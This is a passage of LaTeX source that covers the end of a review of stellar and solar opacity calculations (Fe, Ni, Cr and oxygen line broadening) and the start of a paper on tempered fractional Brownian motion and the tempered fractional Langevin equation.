The OPAL opacity code has been updated (now referred to as TOPAZ) to improve atomic data accuracy and used to recompute the monochromatic opacities of the iron-group elements \cite{igl15a}; small~decreases (less than 6\%) with respect to the OPAL96 tables have been found. The OP collaboration (IPOPv2), on the other hand, has been performing test calculations on the Ni opacity by treating Ni~{\sc xiv} as a study case \cite{del13}, and a new online service for generating opacity tables is available \cite{del16}.
To bypass the computational shortcomings of the detailed-line-accounting methods in managing the huge number of spectral lines of the more complex ions, novel methods based on variations and extensions of the {\it {unresolved-transition-array}} (UTA) concept \cite{bau88} have been implemented. In these methods, the transition array between two configurations is usually reduced to a single Gaussian but can be replaced by a sum of partially resolved transition arrays represented by Gaussians \cite{igl12a, igl12c} that are then sampled statistically to simulate detailed line accounting \cite{igl12b}. For heavy ions where UTAs still fall short, a higher-level extension referred to as the {\it {super-transition-array}} (STA) method involves the grouping of many configurations into a single superconfiguration, whereby the UTA summation to a single STA can be performed analytically \cite{haz12, wil15, kur16}. Recent STA calculations of the RMO in the solar convection zone boundary agree very well with both OP and OPAL, and predict a meager heavy-element ($Z>28$) contribution \cite{kri16a}.
The most salient effort has perhaps been the recent measurements of Fe monochromatic opacities in laboratory plasma conditions similar to the solar CZB ($T_e=1.9{-}2.3$~MK and $N_e=0.7{-}4.0\times~10^{22}$~cm$^{-3}$) that show increments (30--400\%) that have not yet been possible to match theoretically \cite{bai15}. However, the mean-opacity enhancements are still not large enough (only 50\%) to restore the SSM helioseismic benchmarks, but sizeable experimental increases in other elements of the solar mixture such as Cr and Ni would certainly reduce the current discrepancy. Furthermore, a point of concern in this experiment is the model dependency of the electron temperature and density determined by K-shell spectroscopy of tracer Mg; however, as discussed in \cite{nag16}, it is not expected to be large enough to explain the standing disaccord with theory.
The line broadening approximations implemented in most opacity calculations have been recently questioned \cite{kri16b}, reporting large discrepancies between the OP K-line widths and those in other opacity codes. It is also shown therein that the solar opacity profile is sensitive to the pressure broadening of K~lines, which can be empirically matched with the helioseismic indicators by a K-line width increase of around a factor of 100. This moderate line-broadening dependency (a few percent) of the solar opacity near the bottom of the convection zone concurs with previous findings \cite{igl91, sea04}.
\subsection{Fe Opacity}
\label{fe_op}
The iron opacity is without a doubt the most revered in atomic astrophysics due, on the one hand, to its relevance in the structure of the solar interior and in the driving of stellar pulsations, and on the other, to the difficulties in obtaining accurate and complete radiative data sets for the Fe ions. In this respect, the versatile HULLAC relativistic code \cite{bar01} has been used to study CI effects mainly in $3\rightarrow 3$ and $3\rightarrow 4$ transitions that dominate the maximum of the RMO \cite{tur13b}. At $T=27.3$~eV and $\rho=3.4$~mg\,cm$^{-3}$, it is found that CI causes noticeable changes in the spectrum shape due to line shifts at the lower photon energies; good agreement is found with OP in contrast to the spectra by other codes such as SCO-RCG, LEDCOP, and OPAS. The importance of CI is also brought out in comparisons of the OP and OPAL monochromatic opacities with old transmission measurements, namely spectral energy displacements \cite{tur13b}.
However, a further comparison \cite{tur16a} with recent results at $T=15.3$~eV and $\rho=5.48$~mg\,cm$^{-3}$ obtained with the ATOMIC modeling code, results that include contributions from transitions with $n\le 5$, shows significantly higher monochromatic opacities than OP for photon energies greater than 100~eV and almost a factor of 2 increase in the RMO; it is pointed out therein that this is due to limited M-shell configuration expansions in OP for ions such as Fe~{\sc viii}.
A more controversial situation involves the recently measured Fe monochromatic opacities that proved to be higher that expected in conditions similar to the solar CZB \cite{bai15}. Such a result came indeed as a surprise since previous comparisons of transmission measurements at $T=156\pm 6$~eV and $N_e=(6.9\pm 1.7)\times 10^{21}$~cm$^{-3}$ with opacity models---namely ATOMIC, MUTA, OPAL, PRISMSPECT,~and TOPAZ---showed satisfying line-by-line agreement \cite{bai07, igl15b, col16}. Relative to \cite{bai15}, the~OP values are not only lower, but the wavelengths of the strong spectral features are not reproduced accurately. Other codes, namely ATOMIC, OPAS, SCO-RCG, and TOPAZ, perform somewhat better regarding the positions of the spectral features but the absolute backgrounds are also generally too low; moreover,~the~computed RMO are in general smaller than experiment by factors greater than 1.5. It has been suggested that calculations have missing bound--bound transitions or underestimate certain photoinization cross sections \cite{bai15}. The measured windows are higher than those predicted by models, the peak values show a large (50\%) scatter, and the measured widths of prominent lines are significantly broader. On the other hand, from the point of view of oscillator-strength distributions and sum rules, the measured data appear to display unexplainable anomalies \cite{igl15b}.
A recent $R$-matrix calculation \cite{nah16a} involving the topical Fe~{\sc xvii} ionic system has found large (orders of magnitude) enhancements in the background photoionization cross sections and huge asymmetric resonances produced by core photoexcitation that lead to higher (35\%) RMO; however,~such~claims have been seriously questioned \footnote{A.~K. Pradhan, private communication (2017).} \cite{bla16, nah16b, igl17}.
\subsection{Ni and Cr Opacities}
Due to their contributions to the $Z$ bump, the Ni and Cr opacities have also received considerable attention. For the former, it has been shown \cite{tur13b} that CI effects on the RMO are not as conspicuous as those of Fe: they manifest themselves mainly at lower photon energies (50--60~eV), but the spectral features are distinctively different from those of the OP; the latter are believed to be faulty as they were determined by extrapolation procedures. A similar diagnostic has been put forward for Cr, and both are supported by recent transmission measurements in the XUV \cite{tur16a}; moreover, comparisons with data from the ATOMIC code apparently lead to discrepancies with the OP Ni RMO of a factor of 6.
\section{Line, Resonance, and Edge Profiles}
\label{lre}
As mentioned in Section~\ref{op}, a study of line profiles in opacity calculations has shown that OP K-line widths are largely discrepant with those in other plasma models in conditions akin to the solar CZB \cite{kri16b}. Such a finding in fact reflects essential differences in the treatment of ionic models in opacity calculations; i.e., between the OP multichannel representations (see Figure~\ref{atom}) and the simpler uncoupled, or in some cases statistical, versions adopted by other projects that become particularly conspicuous in spectator-electron processes. The latter are responsible for K-line widths, the broad profiles of resonances resulting from core photoexcitation (PECs hereafter) and ionization-edge structures. The K-line pressure broadening issue is also examined.
\subsection{\label{res} Spectator-Electron Processes}
It has been shown that the electron impact broadening of such features is intricate, requiring~the contributions from the interference terms that cause overlapping lines to coalesce such that the spectator-electron relaxation does not affect the line shape, i.e., narrower lines with restricted wings~\cite{igl10}. Electron impact broadening of resonances in the close-coupling formalism is also currently under review \footnote{A.~K. Pradhan, private communication (2016).}. Furthermore, as discussed by \cite{pai15}, spectator-electron transitions can give rise to a large number of X-ray satellite lines that can significantly broaden the resonance-line red wing; since they are difficult to treat in the usual detailed-line-accounting approach, the approximate statistical methods based on UTAs \cite{igl12a, igl12b, igl12c} previously mentioned (see Section~\ref{op}) have been proposed.
In Sections~\ref{pec}--\ref{ie} we briefly discuss how such processes are currently handled within the $R$-matrix framework, in particular with regard to the problem of complete configuration accounting.
\subsubsection{PEC Resonances}
\label{pec}
PECs were first discussed in the OP by \cite{yan87}, and to illustrate their line shapes and widths, we~consider the photoabsorption of the $3sns\ ^1S$ states of Mg-like Al~{\sc ii} described in \cite{but93}:
\begin{equation}
3sns\,^1S+\gamma\rightarrow 3pn's\,^1P^o\rightarrow 3s\,^2S+ e^-\ .
\end{equation}
The PEC arises when $n=n'$ wherein the $ns$ active electron does not participate in the transition. It may be seen in Figure~\ref{al2}a that the photoabsorption cross section of the Al~{\sc ii} $3s^2$ ground state is dominated by a series of $3pn's$ asymmetric window resonances without a PEC since, for $n=n'=3$, $3s3p$ is a true bound state below the ionization threshold. This is not the case for $3s4s\,^1S$, the first excited state (see Figure~\ref{al2}b), where now the $3p4s$ resonance lying just above the threshold becomes a large (two orders of magnitude over the background) PEC. A similar situation occurs in the photoabsorption cross sections of the following excited states of the series, namely $3s5s$ and $3s6s$, that are respectively dominated by the $3p5s$ and $3p6s$ PECs (see Figures~\ref{al2}c,d). It may be appreciated that the $3pns$ PEC widths are approximately constant and independent of the $n$ principal quantum number since their oscillator-strength distributions are mostly determined by the $f(3s,3p)=0.849$ oscillator strength of the Na-like Al~{\sc iii} core \cite{but84}.
\begin{figure}[t!]
\includegraphics[width=0.70\textwidth]{fig6.eps}
\caption{\label{al2} Photoabsorption cross sections of the $3sns$ states of Al~{\sc ii} showing the $3pns$ PEC resonances for $n\geq 4$. (a) $3s^2$; (b) $3s4s$; (c) $3s5s$; (d) $3s6s$.}
\end{figure}
A further relevant point is that, to obtain the $3pns$ PECs in the photoabsorption cross sections of the $3sns$ bound-state series, it suffices to include in the close-coupling expansion of Equation~(\ref{cc}) the Na-like $3s$ and $3p$ core states; however, if the $4s$ and $4p$ states are additionally included, $4pns$ PECs will appear in the cross sections of the $3sns$ excited states for $n\geq 4$, whose resonance properties would be dominated by the Al~{\sc iii} core $f(3s,4p)=0.0142$ oscillator strength \cite{but84}. Due to the comparatively small value of the latter, such PECs will be less conspicuous, but in systems with more complicated electron structures this will not in general be the case. In conclusion, the PEC $n$~inventory directly depends on the $n_{\rm max}$ of core-state expansion in Equation~(\ref{cc}) whose convergence would unavoidably lead to large calculations.
\begin{figure}[t!]
\includegraphics[width=0.47\textwidth]{fig7.eps}
\caption{\label{kres} Total K photoabsorption cross section of the $1s^22s^22p^6\,^1S$ ground state of Fe~{\sc xvii}. (a)~Undamped cross section. (b) Damped (radiation and Auger) cross section.}
\end{figure}
\subsubsection{K Lines}
\label{klines}
K-resonance damping is another example of the dominance of spectator-electron processes, which~can be illustrated with the photoexcitation of the ground state of Fe~{\sc xvii} to a K-vacancy Rydberg state
\begin{equation}
h\nu+ 1s^22s^22p^6\longrightarrow 1s2s^22p^6np\ .
\end{equation}
This state decays via the radiative and Auger manifold
\begin{eqnarray}
1s2s^22p^6np & \stackrel{{\rm K}n}{\longrightarrow}
\label{beta} & 1s^22s^22p^6 + h\nu_n \\
\label{alpha} & \stackrel{{\rm K}\alpha}{\longrightarrow} &
1s^22s^22p^5np+h\nu_\alpha \\
\label{part} & \stackrel{{\rm KL}n}{\longrightarrow} &
\begin{cases}
1s^22s^22p^5 + e^- \\
1s^22s2p^6 + e^-
\end{cases} \\
\label{spec} & \stackrel{{\rm KLL}}{\longrightarrow} &
\begin{cases}
1s^22s^22p^4np + e^- \\
1s^22s2p^5np + e^- \\
1s^22p^6np + e^-
\end{cases},
\end{eqnarray}
which has been shown to be dominated by the radiative K$\alpha$ (Equation~(\ref{alpha})) and Auger KLL (Equation~(\ref{spec})) spectator-electron channels \cite{pal02}. Such damping process causes the widths of the $1s2s^22p^6np$ K resonances to be broad, symmetric, and almost independent of $n$, leading to the smearing of the K~edge as shown in Figure~\ref{kres}.
An inherent difficulty of the $R$-matrix method is that, to properly account for the damped widths of K vacancy states such as $1s2s^22p^6np$, it requires the inclusion of the $1s^22s^22p^4np$, $1s^22s2p^5np$, and $1s^22p^6np$ core configurations of the dominant KLL channels (see Equation~(\ref{spec})) in the close-coupling expansion, which would rapidly make the representation of the high-$n$ resonances as $n\rightarrow \infty$ computationally intractable. To overcome this limitation, Auger damping is currently managed within the $R$-matrix formalism by means of an optical potential \cite{gor99}, which however requires the determination of the core Auger widths beforehand with an atomic structure code (e.g.,~AUTOSTRUCTURE). Furthermore, since K lines have such distinctive symmetric profiles, this~scheme of predetermining made-to-order damped widths to be then included in opacity calculations could also be easily implemented in perturbative methods.
\begin{figure}[t!]
\includegraphics[width=0.5\textwidth]{fig8.eps}
\caption{\label{kop} Monochromatic opacity of a photoionized gas with solar abundances and ionization parameter $\xi=10$, (a) estimated with damped cross sections and (b) estimated with undamped cross sections. Reproduced from Figure~3 of \cite{pal02} with permission of the $^\copyright$AAS.}
\end{figure}
Following \cite{pal02}, the estimated opacity of a photoionized gas with solar elemental abundances and ionization parameter $\xi=10$ is depicted in Figure~\ref{kop} in the photon range 7--8~KeV adopting damped and undamped cross sections. A larger number of broad peaks, particularly the K$\alpha$ transition array around 7.2~KeV, and smeared edges are distinctive damping features. (It must be mentioned that resonances in Figures~\ref{kres}--\ref{kop} are not fully resolved, so in some cases their peak values may appear to be underestimated suggesting departures from line-strength preservation.)
\subsubsection{Ionization Edges}
\label{ie}
While K and L ionization edges are well understood in ground-state photoabsorption cross sections in the $R$-matrix formalism, those for excited states have not received comparable attention. In the same way, as PECs (see Section~\ref{pec}), the K edge arises from a spectator-electron transition whose adequate representation is limited by the $n_{\rm max}$ of the core-state CI complex in the close-coupling expansion. This assertion may be illustrated using the simple O~{\sc vi} Li-like system as a study case.
Let us consider K photoabsorption of the $1s^2ns$ series of this ion; the K edge occurs as
\begin{equation}
1s^2ns + \gamma\longrightarrow 1sns + e^-(kp)
\end{equation}
where the $ns$ electron remains a spectator in the transition; therefore, in a similar fashion to PECs, the~K-edge $n$-inventory would depend on the $n_{\rm max}$ of the core-state representation in the close-coupling expansion (Equation~(\ref{cc})). In Figure~\ref{edges}, the photoabsorption cross sections of these levels are plotted for $n\leq 4$ using three target representations for the He-like core:
\begin{description}
\item[Target~A]---$1s^2$, $1s2\ell$ with $\ell\leq 1$
\item[Target~B]---Target~A plus $1s3\ell'$ with $\ell' \leq 2$
\item[Target~C]---Target~B plus $1s4\ell''$ with $\ell''\leq 3$.
\end{description}
It may be seen that, when Target~A ($n_{\rm max}=2$) is implemented, a K edge appears in the photoabsorption cross section of the $1s^22s$ level but not in those of $1s^23s$ and $1s^24s$; for Target~B, where $n_{\rm max}=3$, K edges are there except in the cross section of the latter; and for Target~C with $n_{\rm max}=4$, they are all present. As shown in Figure~\ref{edges}, adequate K-edge representations for excited states are essential to obtain accurate high-energy tails in their cross sections.
\begin{figure}[h]
\includegraphics[width=0.75\textwidth]{fig9.eps}
\caption{\label{edges} K photoabsorption cross sections of the $1s^2ns$ states of O~{\sc vi}. Left column: $2s$ state. Middle~column: $3s$ state. Right column: $4s$ state. First row: computed with Target~A. Second row: computed with Target~B. Third row: computed with Target~C.}
\end{figure}
Furthermore, it may be seen in Figure~\ref{edges} that, in the photoabsorption of the $1s^2ns$ states of O~{\sc vi}, the strong K lines are also the result of spectator-electron transitions of the type
\begin{equation}
1s^2ns + \gamma\longrightarrow 1s\,ns\,np\ .
\end{equation}
That is, Target~A would be sufficient to generate the K$\alpha$ lines at photoelectron energies of $\sim$32~Ryd in the cross sections of the three states, but to obtain the broad K$\beta$ transitions at $\sim$44~Ryd in the $1s^23s$ cross section, at least Target~B is required. Target~C would then be necessary to obtain the broad K$\gamma$ lines at $\sim$47~Ryd in the $1s^24s$ cross section. This conclusion implies that, in the $R$-matrix method, satellite lines must be explicitly specified in the close-coupling expansion. These difficulties of the $R$-matrix method in obtaining adequate target representations in spectator-electron processes, particularly when involving excited states, are at the core of the controversy around the extended $R$-matrix calculation of Fe~{\sc xvii} L-shell photoabsorption \cite{nah16a, bla16, nah16b, igl17} mentioned in Section~\ref{fe_op}.
\subsection{Pressure Broadening}
To unravel the discrepancies of OP K-line Stark widths with those computed by other opacity codes, we adopt the simpler oxygen opacity as a test bed. This type of comparison has been previously carried out in \cite{bla12, col13, kri16b}. In Figure~\ref{o_ions} pure oxygen monochromatic opacities (corrected for stimulated emission) at $T=192.91$\,eV and $N_e=10^{23}$\,cm$^{-3}$ are plotted as a function of the reduced photon energy $u=h\nu/kT$, where the general overall agreement between OP \cite{bad05} with OPLIB \cite{col13} and STAR \cite{kri16b} (see~upper panel) is very good except for the line wings.
\begin{figure}[t!]
\includegraphics[width=0.9\textwidth]{fig10.eps}
\caption{\label{o_ions} Oxygen monochromatic opacities (corrected for stimulated emission) as a function of the reduced photon energy $u=h\nu/kT$ in the ranges $0\leq u\leq 5.5$ (\textit{upper} panel) and $2.7\leq u\leq 4.3$ (\textit{lower}~panel). Black curve: OP \cite{bad05}. Red curve: OPLIB \cite{col13}. Blue curve: STAR \cite{kri16b}.}
\end{figure}
As listed in Table~\ref{frac}, the dominant charge states are O$^{7+}$, O$^{8+}$, and, to a lesser extent, O$^{6+}$ and O$^{5+}$. Since the Rosseland weighting function peaks at $u=3.83$, the line structure in the spectral interval $2.5\leq u\leq 4.5$ of Figure~\ref{o_ions} is of high relevance: O~{\sc vii} K$\alpha$, O~{\sc viii} Ly$\alpha$, and O~{\sc viii} Ly$\beta$ at $u\approx 2.98$, 3.39,~and 4.02, respectively. Interesting spectral features are the satellite-line arrays in the red wings of K$\alpha$ (mainly from O~{\sc vi} K$\alpha$) and Ly$\alpha$ (mainly from O~{\sc vi} K$\beta$), the latter clearly missing from the OP curve probably due to the completeness issues discussed in Section~\ref{ie}. By comparing the OP and OPLIB curves in detail (see Figure~\ref{o_ions} lower panel), we find that the FWHM of the K$\alpha$, Ly$\alpha$, and Ly$\beta$ lines are similar, but the OP lines have more extended wings; in contrast, the STAR corresponding lines are distinctively narrower. Therefore, at least for oxygen the discrepant broadening of the OP K~lines seems to be due more to the red-wing corrections discussed in \cite{sea90, sea94, sea95} and amply applied to OP monochromatic opacities than to narrower Stark widths, making the oxygen RMO in these plasma conditions somewhat larger ($\sim$15\%) than those of
STAR and OPLIB (see Table~\ref{frac}).
\begin{table}[h]
\caption{\label{frac} RMO and ionization fractions for a pure oxygen plasma at $T=192.91$\,eV and $N_e=10^{23}$\,cm$^{-3}$.
OP: \cite{bad05}. STAR: \cite{kri16b}. OPLIB: \cite{col13}.}
\begin{ruledtabular}
\begin{tabular}{ccccccc}
& RMO & \multicolumn{5}{c}{Ionization fraction (O$^{(8-n)+}$)}\\
\cline{3-7}
Method & (cm$^2$\,g$^{-1}$) & $n=0$ & $n=1$ & $n=2$ & $n=3$ & $n=4$ \\
\colrule
OP & 423 & 0.415 & 0.471 & 1.09 $\times$ 10$^-$\textsuperscript{1} & 5.05 $\times$ 10$^-$\textsuperscript{3} & 1.52$\times$ 10$^-$\textsuperscript{4} \\
STAR & 357 & 0.423 & 0.447 & 1.16 $\times$ 10$^-$\textsuperscript{1} & 1.30 $\times$ 10$^-$\textsuperscript{2} & 8.09 $\times$ 10$^-$\textsuperscript{4} \\
OPLIB & 374 & 0.446 & 0.451 & 9.59 $\times$ 10$^-$\textsuperscript{2} & 6.23 $\times$ 10$^-$\textsuperscript{3} & 1.68 $\times$ 10$^-$\textsuperscript{4} \\
\end{tabular}
\end{ruledtabular}
\end{table}
\section{\label{conc} Concluding Remarks}
In the present report we have reviewed the computational methods used in earlier opacity revisions of the 1980--1990s to produce fairly reliable Rosseland-mean and radiative acceleration tables that have been used to model satisfactorily a variety of astronomical entities, among them the solar interior and pulsating stars. However, more recent developments, e.g., the revision of the solar photospheric abundances and the powerful techniques of helio and asteroseismolgy, have led to a serious questioning of their accuracy.
This critical crossroads has induced extensive revisions of the opacity tables and numerical frameworks, the introduction of novel computational methods (e.g., the STA method) to replace the traditional detailed-line-accounting approaches, and laboratory experiments that simulate the plasma environment of the solar CZB. They have certainly deepened our understanding of the contributing absorption processes but have not yet resulted in definite missing opacities; in this respect, alternative experimental attempts to reproduce the larger-than-expected opacity measurements of \cite{bai15} are currently in progress \cite{qin16, ros16}.
Essential considerations of astrophysical opacity computations are accuracy and completeness in the treatment of the radiative absorption processes, both difficult to accomplish in spite of the powerful computational facilities available nowadays. As reviewed in Section~\ref{op}, it has been shown that configuration interaction (CI) effects are noticeable in the spectrum shape in certain thermodynamic regimes for the topical cases of Cr, Fe, and Ni \cite{gil12, gil13, tur13b}, while incomplete configuration accounting leads to sizable discrepancies in others \cite{tur16a}. To rigorously satisfy both requirements with the OP $R$-matrix method for isoelectronic sequences with electron number $N>13$, it implies close-coupling expansions that soon become computationally intractable and must then be tackled with simpler CI methods (e.g., AUTOSTRUCTURE) that neglect the bound–-continuum coupling. Taking into account the original satisfactory agreement between OPAL and OP as discussed in Section~\ref{revop}, perturbative~methods such as the former appear to have an advantage in opacity calculations insofar as being able to manage configuration accounting more exhaustively. The introduction of powerful numerical frameworks (e.g., STA) to replace detailed line accounting reinforces this assertion. On~the other hand, as discussed in Section~\ref{bigdata}, the OP $R$-matrix approach generates as a byproduct an atomic radiative database (e.g., TOPbase) of sufficient accuracy and completeness to be useful in a wide variety of astrophysical problems.
An inherent limitation of the OP $R$-matrix method in opacity calculations is that radiative properties are calculated assuming isolated atomic targets, i.e., exempt from plasma correlation effects that, as previously pointed out \cite{roz91, cha13b, bel15, das16b}, could significantly modify the ionization potentials, excitation energies, and the bound--free and free--free absorption cross sections. In this respect, it has been recently shown \cite{kri16c} that ion--ion plasma correlations lead to $\sim$10\% and $\sim$15\% increases of the RMO in the solar CZB and in a pure iron plasma, respectively, that could be on their way to solve the solar abundance problem. Plasma interactions by means of Debye--H\"uckel and ion-sphere potentials have already been included in atomic structure CI codes such as GRASP92 and AUTOSTRUCTURE, and are currently being used to estimate the plasma effects on the atomic parameters associated with Fe K-vacancy states \cite{dep17}.
\begin{acknowledgments}
I would like to thank Carlos Iglesias (Lawrence Livermore National Laboratory), James~Colgan (Los Alamos National Laboratory), and Manuel Bautista (Western Michigan University) for reading the manuscript and for giving many useful suggestions. I am also indebted to James Colgan and Menahem Krief (Racah Institute of Physics, the Hebrew University of Jerusalem) for readily sharing their oxygen monochromatic opacity tabulations and ionization fractions. Private communications with Anil K. Pradhan (Ohio State University) and Sunny Vagnozzi (Stockholm University) are acknowledged. This work has been in part supported by NASA grant 12-APRA12-0070 through the Astrophysics Research and Analysis Program.
\end{acknowledgments}
\providecommand{\noopsort}[1]{}\providecommand{\singleletter}[1]{#1}%
| 2024-02-18T23:40:17.435Z | 2018-05-22T02:12:25.000Z | algebraic_stack_train_0000 | 1,947 | 8,034 |
|
proofpile-arXiv_065-9581 | \section{Introduction}
Revealing the mechanism of the motion of particles in complex disordered systems is a fundamental and challenging topic \cite{Shlesinger,Hughes}. Generally, the motion is no longer Brownian because of the complex environment and/or the properties of the particles themselves. The mean squared displacement (MSD) of Brownian motion goes like $\langle(\Delta x)^2\rangle=\langle[x(t)-\langle x(t)\rangle]^2\rangle \sim t^\nu$ with $\nu=1$; for a long time $t$ if $\nu \not= 1$, it is called anomalous diffusion, being subdiffusion for $\nu <1$ and superdiffusion for $\nu > 1$ \cite{Metzler}; in particular, it is termed as localization diffusion if $\nu=0$ and ballistic diffusion if $\nu=2$. There are two types of stochastic processes to model anomalous diffusion: Gaussian processes and non-Gaussian ones; the non-Gaussian processes \cite{Drysdale,Metzler:01,Schumer:03,Bruno:00} include continuous time random walks (CTRWs), L\'evy processes, subordinated L\'evy processes, and the Gaussian ones \cite{Kou,Pipiras,Deng,Meerschaert:02,Eric} contain fractional Brownian motion (fBm), generalized Langevin equation, etc. In this paper, we mainly consider the Langevin type equation with correlated internal noise, being a Gaussian process.
The most basic Gaussian process, describing normal diffusion, is Brownian motion with its corresponding Langevin equation \cite{Coffey:04}
\begin{eqnarray}
m\frac{\rmd v}{\rmd t}=-\xi v+F(t),\nonumber
\end{eqnarray}
where $v$ is the velocity of a Brownian particle with a mass $m$, $\xi $ is a frictional constant, and the random fluctuation force $F(t)$ is white noise. For large $t$, the mean squared displacement of a Brownian particle is $\langle (\Delta x(t))^2\rangle=\langle(\int_0^t v(s)\rmd s)^2\rangle\simeq 2Dt$ with $D=\frac{k_B T}{\xi}$ being the Einstein relation, where $k_B$ is the Boltzmann constant and $T$ the absolute temperature of the environment. As the extension of Brownian motion, fractional Brownian motion (fBm) is still a Gaussian process, which can be seen as the fractional derivative (or integral) of a Brownian motion. The fBm is defined as \cite{Mandelbrot:68}
\begin{eqnarray}
B_H(t)=\frac{1}{\Gamma(1-\alpha)}\int_{-\infty}^{+\infty}[(t-s)_+^{-\alpha}-(-s)_+^{-\alpha}]B(\rmd s),\nonumber
\end{eqnarray}
where
\begin{equation*}
\label{cases}
(x)_+=\cases{x&for $x > 0$\\
0&for $x \leq 0$\\}
\end{equation*}
with $-\frac{1}{2}<\alpha<\frac{1}{2}$, and the Hurst index $H=\frac{1}{2}-\alpha$. Note that Brownian motion is recovered when $H=\frac{1}{2}$. The variance of $ B_H(t)$ is $2D_Ht^{2H}$, where $D_H=[\Gamma(1-2H)\cos(H\pi)]/(2H \pi)$.
Fractional Langevin equation \cite{Deng,Eric}, still being Gaussian process, reads
\begin{eqnarray}
m\frac{\rmd ^2x(t)}{\rmd t^2}=-\xi \int_0^t(t-\tau)^{2H-2}\frac{\rmd x}{\rmd\tau}\rmd\tau+\eta \gamma(t),\nonumber
\end{eqnarray}
where $x(t)$ is the particle displacement, $\eta=[k_BT\xi/(2D_HH(2H-1))]^{1/2}$, $\gamma(t)=\rmd B_H(t)/\rmd t$ is the fractional Gaussian noise, and $1/2<H<1$ is the Hurst parameter.
The mean squared displacement of the trajectory sample $x(t)$ for large $t$ is $\langle x^2(t)\rangle\simeq2k_BT/(\xi\Gamma(2H-1)\Gamma(3-2H))t^{2-2H}$.
Along the direction of extension of Brownian motion, the new Gaussian process, called tempered fractional Brownian motion (tfBm) \cite{Meerschaert:00}, was introduced by Meerschaert and Sabzikar with its definition
\begin{eqnarray}\label{PDF}
B_{\alpha,\lambda}(t)=\int_{-\infty}^{+\infty}[\rme^{-\lambda(t-x)_+}(t-x)_+^{-\alpha}-\rme^{-\lambda(-x)_+}(-x)_+^{-\alpha}]B(\rmd x), \end{eqnarray}
where $\lambda>0$, $\alpha<\frac{1}{2}$, and the Hurst index $H=\frac{1}{2}-\alpha$;
and its basic theory was developed with application to modeling wind speed. This paper naturally introduces the generalized Langevin equation, termed as tempered fractional Langevin equation (tfLe), with the tempered fractional noise as internal noise. We discuss the ergodicity of the tfBm, and derive the corresponding Fokker-Planck equation. The mean squared displacement (MSD) of the tfLe is carefully analyzed, displaying the transition from $t^2$ (ballistic diffusion for short time) to $t^{2-2H}$, and then to $t^2$ (again ballistic diffusion for long time). For the overdamped tfLe, its MSD transits from $t^{2-2H}$ to $t^2$ (ballistic diffusion). The properties of the correlation function of the tfLe with harmonic potential is also considered.
The outline of this paper is as follows. In Section \ref{two}, we review the tfBm, derive its Fokker-Planck equation, and discuss its ergodicity. The tfLe is introduced in Section \ref{three}, in which the underdamped case, overdamped case, and the tfLe with harmonic potential are discussed in detail. We conclude the paper with some discussions in the last section.
\section{Tempered fractional Brownian motion and tempered fractional Gaussian noise}\label{two}
\setcounter{equation}{0}
We introduce the definitions of the tfBm and the tempered fractional Gaussian noise (tfGn). The Fokker-Planck equation for tfBm is derived, and the ergodicity of the tfBm is discussed.
\subsection{Tempered fractional Brownian motion}
Tempered fractional Brownian motion is defined in (\ref{PDF}), which modifies the power law kernel in the moving average representation of a fractional Brownian motion by adding an exponential tempering \cite{Meerschaert:00}; it is generalizedly self-similar in the sense that for any $c>0$
\begin{equation} \label{self-similar}
\{ B_{\alpha,\lambda}(ct) \}_{t \in \mathbb{R}} = \{ c^{H} B_{\alpha,c\lambda}(t) \}_{t \in \mathbb{R}}
\end{equation}
in distribution and it has the covariance function
\begin{eqnarray}\label{covariance}
\textrm{Cov}[B_{\alpha,\lambda}(t),B_{\alpha,\lambda}(s)]=\frac{1}{2}\left[C_t^2|t|^{2H}+C_s^2|s|^{2H}-C_{t-s}^2|t-s|^{2H}\right]
\end{eqnarray}
for any $t,s\in\mathbb{R}$, where
\begin{eqnarray} \label{Cdelta}
C_t^2&=\int_{-\infty}^{+\infty}\left[\rme^{-\lambda|t|(1-x)_+}(1-x)_+^{-\alpha}-\rme^{-\lambda|t|(-x)_+}(-x)_+^{-\alpha}\right]^2\rmd x\\ &=\frac{2\Gamma(2H)}{(2\lambda|t|)^{2H}}-\frac{2\Gamma(H+\frac{1}{2})K_H(\lambda|t|)}{\sqrt{\pi}(2\lambda|t|)^H}\nonumber
\end{eqnarray}
for $t\neq 0$ and $C_0^2=0$, where $K_H(x)$ is the modified Bessel function of the second kind \cite{Meerschaert:00}. It is obvious that the variance of tfBm is $\langle B_{\alpha,\lambda}^2(t)\rangle=C_t^2|t|^{2H}\simeq 2\Gamma(2H)(2\lambda)^{-2H}$ as $t\rightarrow \infty$ on account of $K_H( t)\simeq\sqrt{\pi}(2 t)^{-\frac{1}{2}}\rme ^{ -t}$, which means that tfBm is localization. And $\langle B_{\alpha,\lambda}(t)\rangle=0$. Since $B_{\alpha,\lambda}(t)$ is a Gaussian process, when $t>0$, $B_{\alpha,\lambda}(t)\sim N(0,C_t^2t^{2H})$. Then it has the probability density function (PDF)
\begin{eqnarray}\label{PDB}
P(x,t)=\frac{1}{\sqrt{2\pi C_t^2t^{2H}}}\rme^{-\frac{x^2}{2C_t^2t^{2H}}}.
\end{eqnarray}
The Fourier transform of (\ref{PDB}) is $P(k,t)=\int_{-\infty}^{+\infty}\rme ^{\rmi kx}P(x,t)\rmd x=\rme ^{-C_t^2t^{2H}k^2/2}$; taking partial derivative w.r.t. $t$ and performing inverse Fourier transform on both sides of this equation lead to
\begin{eqnarray}\label{PDA}
\frac{\partial P(x,t)}{\partial t}=-\frac{\Gamma(H+\frac{1}{2})}{\sqrt{\pi}(2\lambda)^H}\left[Ht^{H-1}K_H(\lambda t)+t^H\dot K_H(\lambda t)\right]\frac{\partial^2P(x,t)}{\partial x^2}.
\end{eqnarray}
For large $t$, from (\ref{PDA}), we have that the PDF is asymptotically governed by
\begin{eqnarray}
\frac{\partial P(x,t)}{\partial t}=\frac{\Gamma(H+\frac{1}{2})\rme^{-\lambda t}}{(2\lambda)^{H+\frac{1}{2}}}\left[\lambda t^{H-\frac{1}{2}}-\left(H-\frac{1}{2}\right)t^{H-\frac{3}{2}}\right]\frac{\partial^2P(x,t)}{\partial x^2}.
\end{eqnarray}
The non-Markovian property is implied by the time-dependent diffusion constant: $D_{\alpha,\lambda}(t)=(2\lambda)^{-H-1/2}\Gamma(H+1/2)\rme^{-\lambda t}[\lambda t^{H-1/2}-(H-1/2)t^{H-3/2}]$.
